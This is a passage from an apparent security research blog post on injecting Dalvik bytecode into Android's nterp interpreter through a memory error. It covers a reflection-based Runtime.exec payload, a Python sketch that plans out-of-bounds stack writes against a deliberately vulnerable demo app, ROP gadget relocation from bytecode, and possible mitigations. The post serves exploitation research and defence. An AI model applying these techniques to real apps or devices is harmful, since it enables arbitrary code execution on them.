# 0054: 23 77 14 00       NEW_ARRAY v7, v7, TYPE:[Ljava/lang/Class;
        .new_array(v7, v7, 'Class[]')
# 0058: 12 08             CONST_4 v8, #+0
        .const_16(v8, 0)
# 005a: 1c 09 0c 00       CONST_CLASS v9, TYPE:Ljava/lang/String;
        .const_class(v9, 'String')
# 005e: 4d 09 07 08       APUT_OBJECT v9, v7, v8
        .aput_object(v9, v7, v8)
# 0062: 6e 30 07 00 65 07 INVOKE_VIRTUAL {v5, v6, v7}, METHOD:Ljava/lang/Class;->getDeclaredMethod(Ljava/lang/String;,[Ljava/lang/Class;)Ljava/lang/reflect/Method;
        .invoke_virtual(3, class_getdeclaredmethod_index, [v5, v6, v7])
# 0068: 0c 05             MOVE_RESULT_OBJECT v5
        .move_result_object(v5)
# 006a: 6e 10 0d 00 01 00 INVOKE_VIRTUAL {v1}, METHOD:Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
        .invoke_virtual(1, stringbuilder_tostring_index, [v1])
# 0070: 0c 06             MOVE_RESULT_OBJECT v6
        .move_result_object(v6)
# 0072: 24 10 15 00 06 00 FILLED_NEW_ARRAY {v6}, TYPE:[Ljava/lang/Object;
        .filled_new_array(1, 'Object[]', [v6])
# 0078: 0c 06             MOVE_RESULT_OBJECT v6
        .move_result_object(v6)
# 007a: 6e 30 0f 00 45 06 INVOKE_VIRTUAL {v5, v4, v6}, METHOD:Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;,[Ljava/lang/Object;)Ljava/lang/Object;
        .invoke_virtual(3, method_invoke_index, [v5, v4, v6])
# 0080: 0e 00             RETURN_VOID 
        .return_void()
# 0082: 00 00             NOP 
        .nop()
# 0084: ARRAY_PAYLOAD Array@{108, 111, 103, 32, 34, 104, 101, 108, 108, 111, 32, 116, 104, 101, 114, 101, 33, 34}
        .array_payload(2, len(command), command_buffer)
# 00b0: ARRAY_PAYLOAD Array@{101, 120, 101, 99}
        .array_payload(2, 4, b'e\x00x\x00e\x00c\x00')).build()

The Java equivalent could look something like this:

char[] cCommand = new char[] { <command> };
StringBuilder bCommand = new StringBuilder();
bCommand.append(cCommand);
char[] cExec = new char[] {'e', 'x', 'e', 'c'};
StringBuilder bExec = new StringBuilder();
bExec.append(cExec);
Runtime runtime = Runtime.getRuntime();
Class<?> runtimeClass = runtime.getClass();
String execName = bExec.toString();
Class[] signature = new Class[] { String.class };
Method exec = runtimeClass.getDeclaredMethod(execName, signature);
String command = bCommand.toString();
Object[] args = new Object[] { command };
exec.invoke(runtime, args);

The Attack

With a payload at hand, it is time to abuse the memory error and obtain arbitrary command execution in the context of the target app.

Before injecting the bytecode, the leaked stack address must be understood properly in order to find the exact location of the payload. To that end, a particular execution yields a leak of 0x6eb6aec650. Remember the original C code of writeIndexed:

extern "C"
JNIEXPORT void JNICALL
Java_com_poc_poc_1remote_MainActivity_writeIndexed(JNIEnv *env, jclass clazz,
                                                   jint index, jlong value)
                                                   __attribute__ ((optnone)) {
    uint64_t i;
    uint64_t *buffer = &i;
    buffer[index] = value;
}

With that in mind, let's consider the following simplified disassembly of the vulnerable writeIndexed method:

sub     sp, sp, #0x50
stp     x29, x30, [sp, #64]
add     x29, sp, #0x40  ; frame pointer = sp + 0x40
sub     x8, x29, #0x10  ; buffer = frame pointer - 0x10 = sp + 0x30
str     x8, [sp, #8]
...
ldr     x9, [sp, #8]    ; base address
ldrsw   x10, [sp, #28]  ; index
mov     x11, #0x8       ; element size
madd    x9, x10, x11, x9    ; where = index * size + base
str     x8, [x9]    ; indexed write

In a nutshell, the buffer is located 0x10 bytes below the saved frame pointer and return address. This can be confirmed using a debugger:

gef➤  x/1gx $sp+0x8
    0x6eb6aec628:   0x0000006eb6aec650
gef➤  p/x $x29-0x10
    $1 = 0x6eb6aec650

Coincidentally, the pointer leaked via leakStack is exactly the base address of the buffer, relative to which the indexed OOB write happens.

Now, two things must be identified:

At what index does the dex_pc reside?
Where is a safe location to store the payload?

The first point is addressed to some degree in a previous section that showed a reverse-engineered view of the stack, taking into account nterp and JNI stack frames. Therefore, without showing the details of the stack again, the byte offset to write to can be computed by subtracting the buffer base address from the address of the spilled x22 register. Then, because buffer elements are 64-bit integers, the offset is divided by the element size to obtain the final index (recall that the primitive is an indexed OOB write).

gef➤  p/x (0x00006eb6aec6d8 - 0x00006eb6aec650) / 8
$2 = 0x11

Next, the payload must be stored in a stable region on the stack. Most importantly, none of the data structures required to continue the execution of the (hijacked) bytecode method that called writeIndexed may be corrupted. With some testing, it turns out that the payload may be placed 0x1000 bytes past the buffer base address (towards higher addresses), i.e. starting at index 0x1000 / 8 = 0x200.
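Both findings can be combined into a list of indexed writes. The following Python sketch is only an illustration under stated assumptions: the helper names (index_of, to_jlong, build_write_plan) are hypothetical, the addresses are the ones from the debugging session above, and the four payload bytes are a placeholder for the real payload. It also assumes that the dex_pc should be overwritten last, so that the payload is already in place when execution is redirected.

```python
import struct

ELEMENT_SIZE = 8  # buffer elements are uint64_t


def index_of(target_addr, buffer_base):
    """Return the index i such that &buffer[i] == target_addr."""
    offset = target_addr - buffer_base
    if offset % ELEMENT_SIZE:
        raise ValueError("target is not 8-byte aligned relative to the buffer")
    return offset // ELEMENT_SIZE


def to_jlong(value):
    """Reinterpret an unsigned 64-bit value as a signed Java long."""
    return struct.unpack("<q", struct.pack("<Q", value))[0]


def build_write_plan(leak, dex_pc_slot, payload, payload_offset=0x1000):
    """Return (index, value) pairs: payload words first, dex_pc overwrite last."""
    # Pad with zero bytes (00 00 decodes as NOP) up to a multiple of 8 bytes.
    padded = payload + b"\x00" * (-len(payload) % ELEMENT_SIZE)
    first_index = index_of(leak + payload_offset, leak)
    plan = []
    for i in range(0, len(padded), ELEMENT_SIZE):
        (word,) = struct.unpack_from("<Q", padded, i)
        plan.append((first_index + i // ELEMENT_SIZE, to_jlong(word)))
    # Finally, point the spilled dex_pc at the start of the payload.
    plan.append((index_of(dex_pc_slot, leak), to_jlong(leak + payload_offset)))
    return plan


# Addresses taken from the debugging session; payload bytes are a placeholder.
plan = build_write_plan(0x6EB6AEC650, 0x6EB6AEC6D8, bytes.fromhex("13001200"))
```

Each pair in plan corresponds to one call of writeIndexed(index, value). The conversion in to_jlong is needed because the value parameter is a signed jlong on the Java side.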

For a PoC, consider the following video.

Context-Switching

In this section, I want to discuss a few approaches to handling insufficient contexts during bytecode injection. A major problem arises if the available context does not provide enough types or methods to do anything useful. For example, if the StringBuilder type were missing in the above case study, the payload would not work. Of course, as is discussed later, we could try to use bytecode as an intermediate stage in case the context is insufficient.

Alternatively, if an attacker wants to execute only bytecode, e.g. because native-level security mechanisms prevent any kind of ROP, then the only option left is to switch the context. As of writing, two ways to perform context-switching come to mind. Both approaches work by corrupting a different dex_pc than the one that provides an insufficient context. In general, as long as an attacker can ensure that a dex_pc is executed eventually, that dex_pc may be used to switch the execution context. The following visualization shows the high-level idea of context-switching. Notice that the context is determined by an attacker’s goals.

The first approach is to try to corrupt an ArtMethod that is stored in a predictable location. For this to work, the method must be called after the attacker corrupted the dex_pc. Finding an ArtMethod instance is tricky and may require additional information leaks for a remote attacker. In a local setting, there exists a plethora of ArtMethods to be used by an attacker, e.g. in boot.art.

Secondly, if an attacker is only given the ability to corrupt stack values, then the bytecode method call chain can be traversed to find a fitting context. Because the Android runtime is complex, often plenty of method invocations are performed until the vulnerable native method is called eventually. This leaves room to corrupt other dex_pcs belonging to parent methods. However, if an attacker is unable to go up the call chain, then it may be possible to go down the call chain. To that end, an attacker needs to be able to invoke a method that takes in a callback. If an attacker is able to pass a callback consisting of custom bytecode into a method, then this will result in a new call chain until the callback is invoked. These ideas are visualized in the following diagram.

Basically, the above figure shows stack frames matching a call chain. On the left, an attacker corrupts any spilled dex_pc on the stack, potentially switching the context depending on which method is hijacked. On the right, an attacker somehow manages to pass custom bytecode into a method that eventually invokes that bytecode. From there on, an attacker can either use bytecode to corrupt a legitimate calling method that stems from the callback call chain, or stay in the context of the callback. Notice, however, that specifying a callback almost certainly requires knowledge of the class of the callback object. Therefore, specifying a callback requires knowing the context of the callback, which somewhat defeats the purpose of doing this in the first place.

Regardless of which approach is used, the best context to end up in is a .dex file of framework.jar. These .dex files contain a large fraction of the app-related Android runtime and thus provide a lot of types and methods. Moreover, because framework.jar is copied to all apps forked from zygote64, pure bytecode payloads for .dex files of framework.jar are universal for the target device under the assumption that framework.jar does not change.

Further Applications

The case study shows that bytecode injection can be used to fully take over a thread in the target app via a memory error. For the PoC, bytecode is used to invoke a system command.

However, it is also possible to use bytecode as an intermediate stage, e.g. to set up a ROP chain. To that end, remember that vregs are not bounds-checked. Therefore, any attacker-chosen bytecode can access, i.e. read and write, any value on the stack following the vregs and vrefs arrays of the hijacked method. Ignoring the fact that writing to e.g. v0 almost always writes to r0 as well, bytecode can set up ROP gadgets on the stack by filling the vregs and vrefs that overlap with a return address. Notice that one can use bytecode instructions like move-object, which always write a value to both vregs and vrefs. Then, an attacker can pretend to write only to vrefs when setting up the ROP chain on the stack, ignoring the fact that writing to vrefs at some point overwrites the values stored in vregs.
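To make the overlap more tangible, consider the following toy model in Python. It is not ART code: ToyFrame and its layout are assumptions made purely for illustration, namely that the frame consists of 32-bit slots, that the vrefs array sits directly below the vregs array, and that other stack data (e.g. a return address) follows directly after the vregs. The move_object method mimics an unchecked move-object that writes to both arrays.

```python
class ToyFrame:
    """Toy frame of 32-bit slots: [vrefs | vregs | trailing stack data]."""

    def __init__(self, num_vregs, trailing_slots):
        self.num_vregs = num_vregs
        self.vrefs_base = 0          # assumed: vrefs come first
        self.vregs_base = num_vregs  # assumed: vregs follow directly
        self.slots = [0] * (2 * num_vregs + trailing_slots)

    def set_vreg(self, index, value):
        """Store a 32-bit value into vregs[index]."""
        self.slots[self.vregs_base + index] = value & 0xFFFFFFFF

    def move_object(self, dst, src):
        """Copy vregs[src] into vregs[dst] and vrefs[dst] without bounds checks."""
        value = self.slots[self.vregs_base + src]
        self.slots[self.vregs_base + dst] = value
        self.slots[self.vrefs_base + dst] = value


frame = ToyFrame(num_vregs=4, trailing_slots=4)
frame.set_vreg(0, 0x41414141)
frame.move_object(5, 0)  # v5 does not exist: the method only owns v0..v3
```

In this model, the write through the vregs array lands in the trailing stack data (slot 9), while the write through the vrefs array clobbers v1 (slot 5). This mirrors the observation that writing to out-of-bounds vrefs eventually overwrites values stored in vregs.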

In the example above, using ROP directly is most likely impossible, because an attacker is lacking knowledge on the location of an executable memory region to return into. However, because bytecode can read beyond the vregs array, an attacker can pick up a code pointer stored on the stack, e.g. a return address, and use it to compute the base address of the associated module. Of course, an attacker must be able to either identify the module to compute the base address, or handle segfaults to probe for the beginning of the memory region. Given the base address, an attacker can then relocate their own gadgets stored inside the bytecode, e.g. as constants encoded inside instructions, to obtain a fully functional ROP chain. Then, what is left is to link the ROP chain into a return address, which kicks off gadget chain execution.

For example, the following bytecode can be used to grab the base address of libart.so. Notice that return_address_vreg_index and return_address_offset are to be chosen by an attacker and mean the index of the return address in terms of vregs and the offset of the return address relative to libart.so, respectively.

move-wide/16    v0, v<return_address_vreg_index>
const-wide      v2, <return_address_offset>
sub-long        v0, v0, v2

Once a fitting ROP chain is found, parts of the chain must be marked for dynamic relocation. An example of a ROP chain component that does not need relocation is a command string. Of course, if working with the address of the command string, relocation will be necessary again. Consider the generic bytecode for relocating ROP gadgets:

const-wide      v2, gadget
add-long        v2, v2, v<libart_base_vreg_index>
move-object/16  v<2 * index + return_address_vreg_index>, v2
move-object/16  v<2 * index + return_address_vreg_index + 1>, v3

In a nutshell, gadget is the offset of the current gadget relative to libart.so. The offset is stored to v2 and v3 (64 bits in total) and added to the vreg pair that holds the base address of libart.so. The result is stored back into v2 and v3. Afterwards, move-object/16 is used to write the lower and upper 32-bit halves of the relocated address into the vregs and vrefs that represent the current ROP chain gadget on the stack. The above code snippet is executed for each ROP gadget, which means the ROP chain is built up gadget by gadget at runtime. This is only possible because vreg and vref indices are not bounds-checked at runtime. Furthermore, observe that gadget offsets are stored inside the bytecode and relocated using the libart address picked up from the stack.
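The arithmetic behind the relocation can be sketched in a few lines of Python. This is a model of what the bytecode computes, not part of the exploit itself: the function names and all concrete addresses, offsets and indices below are hypothetical and chosen only to make the example self-contained.

```python
MASK32 = 0xFFFFFFFF
MASK64 = 0xFFFFFFFFFFFFFFFF


def libart_base(return_address, return_address_offset):
    """Mirror of sub-long: leaked return address minus its offset in libart.so."""
    return (return_address - return_address_offset) & MASK64


def relocate_chain(base, gadget_offsets, return_address_vreg_index):
    """Return (vreg_index, 32-bit value) writes that place the relocated chain.

    Each 64-bit gadget address occupies two consecutive 32-bit vreg slots,
    lower half first, starting at the slots that overlap the return address.
    """
    writes = []
    for index, offset in enumerate(gadget_offsets):
        address = (base + offset) & MASK64          # add-long
        slot = 2 * index + return_address_vreg_index
        writes.append((slot, address & MASK32))     # first move-object/16
        writes.append((slot + 1, address >> 32))    # second move-object/16
    return writes


# Hypothetical values for illustration only.
base = libart_base(0x7A12345678, 0x345678)
writes = relocate_chain(base, [0x1000, 0x2000], return_address_vreg_index=40)
```

With these made-up inputs, the first gadget ends up in the vreg slots 40 and 41 and the second one in slots 42 and 43, which is the 2 * index + return_address_vreg_index pattern from the bytecode above.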

Without discussing all the details of the PoC exploit, the following visualization aims to highlight the general idea of using bytecode to relocate a ROP chain.

Visualization of bytecode-based ROP attack

And finally, to finish off the idea of bytecode-induced ROP attacks, a PoC video is provided!

Another interesting approach may be to look into similar bytecode-related exploitation areas, like V8. Usually, when exploiting a bug in V8, an attacker builds up primitives like fakeobj and addrof, which are often escalated into read and write primitives. Without having looked into this thoroughly, it may be possible to use the same ideas when injecting bytecode to construct and access objects that allow reading from and writing to arbitrary memory regions. However, a limiting factor seems to be that object references are always 32-bit addresses. Luckily, there exist classes like Parcel and its associated C++ implementation that store 64-bit pointers inside objects. Taking into account that Parcel provides methods like writeLong, which writes a 64-bit value to a location relative to an internal pointer, Parcel seems like the perfect candidate to build up WWW and RWW primitives from bytecode. Furthermore, Parcel is a very common class and thus available in a plethora of contexts. Unfortunately, due to time constraints, I have not been able to construct a PoC for this idea.

Possible Mitigations

Following native-level mitigations against code injection, the first idea that comes to mind is to somehow force nterp to distinguish between code and data. For example, it may be possible to restrict dex_ptr to .dex files only. However, even inside a .dex file, data and code are mixed. For example, the code_item of a method in a .dex file consists of metadata describing the method and the concrete bytecode implementing it. Therefore, restricting bytecode execution to .dex files does not suffice, unless it can be guaranteed that redirecting bytecode execution to data structures in a .dex file never suffices for a successful exploit, and such a guarantee is impossible to give. Because data and bytecode are closely coupled in memory, nterp cannot use page permissions either: page permissions are too coarse.
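The limitation of such a coarse check can be illustrated with a small Python sketch. Everything here is hypothetical: make_range_check is not an ART function, and the addresses are invented. The only layout fact relied upon is that a standard code_item starts with a 16-byte header (registers_size up to insns_size) before the instruction array.

```python
from bisect import bisect_right


def make_range_check(ranges):
    """Build a predicate telling whether an address lies in any [start, end) range."""
    ordered = sorted(ranges)
    starts = [start for start, _ in ordered]

    def contains(addr):
        i = bisect_right(starts, addr) - 1
        return i >= 0 and addr < ordered[i][1]

    return contains


# Hypothetical memory layout for illustration only.
DEX_FILES = [(0x70000000, 0x70100000)]  # one mapped .dex file
CODE_ITEM = 0x70001200                  # start of some code_item
CODE_ITEM_HEADER_SIZE = 16              # metadata preceding the bytecode
INSNS = CODE_ITEM + CODE_ITEM_HEADER_SIZE

dex_pc_allowed = make_range_check(DEX_FILES)

legit = dex_pc_allowed(INSNS)              # real bytecode: accepted
metadata = dex_pc_allowed(CODE_ITEM + 4)   # code_item metadata: also accepted
stack = dex_pc_allowed(0x6EB6AED650)       # payload on the stack: rejected
```

Such a check would stop the stack-based payload from the case study, but it cannot tell the instruction array apart from the metadata right in front of it.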

Another approach could be to redesign the layout of .dex files so that bytecode is stored in executable, read-only regions, whereas associated data structures are stored in adjacent read-only memory. Whether this is practical remains to be determined. Such a major redesign would also need rigorous permission checks, because nterp does not have hardware support that prevents execution of non-executable memory.

Summary

In this blog post, the first bytecode-based exploitation technique, namely bytecode injection, is discussed and demonstrated using a simplistic, deliberately vulnerable Android app. Various caveats regarding bytecode injection, like String construction, method invocation and even insufficient contexts, are explained and solved. Furthermore, it is highlighted how bytecode may function as a stepping stone for other attacks like ROP.

A neat side effect is that bytecode is architecture-agnostic. Only changes to the bytecode interpreter can prevent bytecode shellcode from executing successfully. Because it is possible to create Android apps for various older Android versions, shellcode can most certainly be made as backward-compatible as an app can be.
